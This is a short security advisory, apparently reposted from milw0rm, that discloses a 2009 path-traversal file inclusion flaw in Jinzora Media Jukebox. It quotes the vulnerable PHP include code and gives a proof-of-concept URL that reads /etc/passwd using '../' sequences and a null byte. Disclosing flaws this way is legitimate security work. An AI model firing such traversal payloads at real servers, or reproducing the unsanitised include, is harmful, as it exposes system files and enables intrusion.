Jinzora Media Jukebox <= 2.8 (name) Local File Inclusion Vulnerability

2009.07.08
Credit: dun
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ dun[at]strcpy.pl ] ## # [ Jinzora Media Jukebox <= 2.8 ] Local File Inclusion Vulnerability # ## # # Script site: http://jinzora.com/ , http://sourceforge.net/projects/jinzora/ # Download: http://downloads.sourceforge.net/jinzora/jz280.tar.gz?use_mirror=freefr # # Vuln: http://site.com/jinzora2/index.php?op=1&name=../../../../../../etc/passwd%00 # # Bug: ./jinzora2/index.php (lines: 36-47, 95) # # ... # $include_path = ""; $link_root = ""; $cms_type = "standalone"; $cms_mode = "false"; # $backend = ""; $jz_lang_file = ""; $skin = ""; $my_frontend = ""; # # if (isset($_GET['op'])){ // (1) # // This has got to be postnuke... # $include_path = "modules/". $_GET['name']. "/"; // (2) # $link_root = "modules.php?"; # $cms_type = "postnuke"; # $cms_mode = "true"; # } else if (isset($_GET['name']) and !isset($_GET['op'])){ # // This has got to be phpnuke # $include_path = "modules/". $_GET['name']. "/"; # ... # # @include($include_path. 'settings.php'); // (3) LFI # ... # # ############################################### # Greetz: mama * tata * str0ke * and otherz.. ############################################### [ dun / 2009 ]

References:

http://www.milw0rm.com/exploits/8278


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top